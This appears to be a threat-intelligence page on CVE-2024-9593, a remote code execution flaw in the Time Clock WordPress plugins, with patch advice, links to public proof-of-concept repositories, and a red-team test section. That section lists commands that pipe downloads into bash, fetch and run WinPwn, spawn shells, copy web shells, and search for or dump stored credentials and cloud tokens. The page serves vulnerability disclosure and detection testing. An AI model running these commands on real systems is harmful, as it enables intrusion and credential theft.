CVE-2024-9593
Overview
This vulnerability is a remote code execution flaw stemming from improper handling of user-supplied input in the 'etimeclockwp_load_function_callback' function within the Time Clock and Time Clock Pro WordPress plugins. The root cause is the lack of input validation or sanitization that allows execution of arbitrary PHP code. The affected components are the Time Clock plugin (up to version 1.2.2) and Time Clock Pro plugin (up to version 1.1.4).
Vulnerability Description
The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
Impact
An unauthenticated attacker can execute arbitrary code on the web server hosting the vulnerable plugins, leading to full system compromise, data theft, or service disruption. No authentication or user interaction is required (CVSS vector AV:N/AC:L/PR:N/UI:N), and the vulnerability affects the confidentiality, integrity, and availability of the system (S:C/C:L/I:L/A:L). This allows attackers to bypass security controls and gain persistent access to the affected WordPress environment.
Solution
Users should update the Scott Paterson Time Clock plugin to version 1.2.3 or later and the Time Clock Pro plugin to version 1.1.5 or later, where the vulnerability has been addressed. Detailed patch information and version updates are available from the WordFence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/247e599a-74e2-41d5-a1ba-978a807e6544. Applying these updates will mitigate the remote code execution risk by correcting input handling in the affected function.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Time Clock and Time Clock Pro plugins for WordPress allows for Remote Code Execution (RCE) due to improper handling of function callbacks. Specifically, the 'etimeclockwp_load_function_callback' function is exploited by unauthenticated attackers, enabling them to execute arbitrary code on the server. This flaw arises from a lack of adequate input validation and sanitization, which permits attackers to manipulate the execution flow of the application. The absence of restrictions on the parameters passed to this function means that an attacker can potentially invoke any function available within the server's context, leading to severe consequences.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Since the vulnerability does not require authentication, any individual with knowledge of the affected plugins can initiate an attack. The exploitation can be performed through crafted HTTP requests that target the vulnerable function, allowing the attacker to execute malicious code directly on the server. Scenarios may include deploying web shells, altering files, or even pivoting to other systems within the network. The simplicity of this attack vector makes it accessible to a wide range of threat actors, from script kiddies to more sophisticated adversaries.
The real-world impact of this vulnerability is significant, particularly for organizations relying on these plugins for time tracking and management. Successful exploitation can lead to unauthorized access to sensitive data, manipulation of business operations, and potential data breaches. The business risks associated with such an incident include financial losses, reputational damage, and regulatory penalties, especially if personal data is compromised. Furthermore, the potential for lateral movement within a compromised network could expose additional systems to attack, amplifying the overall risk to the organization.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating plugins to their latest versions is crucial, as this ensures that known vulnerabilities are patched. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests targeting the vulnerable function. Monitoring server logs for unusual activity, such as unexpected function calls or unauthorized access attempts, can also aid in early detection of exploitation attempts. Furthermore, conducting regular security assessments and penetration testing can help identify and remediate vulnerabilities before they can be exploited.
In conclusion, the Remote Code Execution vulnerability in the Time Clock and Time Clock Pro plugins poses a serious threat to WordPress installations. The ease of exploitation, coupled with the potential for significant real-world impact, necessitates immediate attention from organizations utilizing these plugins. By adopting proactive security measures, including timely updates, monitoring, and comprehensive security assessments, organizations can mitigate the risks associated with this vulnerability and protect their digital assets from potential exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2024-9593 vulnerability, indicated by a doubling in detection frequency across our sensors. This increase, while still emerging, signals growing adversary interest and experimentation with the unauthenticated remote code execution vector in the Time Clock and Time Clock Pro WordPress plugins. Concurrently, new proof-of-concept exploits have surfaced on public repositories, broadening the accessibility of attack tools to a wider range of threat actors. Although the EPSS score remains stable, the combination of heightened detection activity and expanded exploit availability elevates the risk profile for affected environments. Defenders should interpret this trend as an early indicator of potential exploitation campaigns gaining momentum, underscoring the urgency of monitoring and response efforts. The threat level is therefore adjusted to reflect an increased likelihood of active exploitation attempts in the near term.
Update 2 — July 20, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-9593, indicating that exploitation attempts are becoming more frequent and widespread. Concurrently, new proof-of-concept exploits have surfaced on public repositories, increasing the accessibility of attack tools to less sophisticated threat actors. Although the EPSS score shows a slight decline, this metric does not fully capture the growing operational momentum observed in our telemetry. The convergence of heightened detection signals and expanded exploit availability suggests that adversaries are intensifying efforts to leverage this vulnerability. Consequently, the threat level for affected environments should be elevated to reflect a higher probability of active exploitation campaigns in the near term, underscoring an urgent need for vigilant monitoring.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wpplugin | Time Clock | All |
cpe:2.3:a:wpplugin:time_clock:*:*:*:*:pro:wordpress:*:*
|
|
|
Wpplugin | Time Clock | All |
cpe:2.3:a:wpplugin:time_clock:*:*:*:*:-:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-9593
Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Unauthenticated (Limited) Remote Code Execution
|
RandomRobbieBF | 8 | 2 | 2024-10-18 | View |
|
0x4f5da2-venom/CVE-2024-9593-EXP
CVE-2024-9593 WordPress插件的远程代码执行
|
0x4f5da2-venom | 2 | 0 | 2024-11-18 | View |
|
Nxploited/CVE-2024-9593-Exploit
|
Nxploited | 1 | 0 | 2025-01-01 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9593 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/247e599a-74e2-41d5-a1ba-978a807e6544?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/time-clock/tags/1.2.2/includes/admin/ajax_functions_admin.php#L58 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3171046/time-clock#file40 |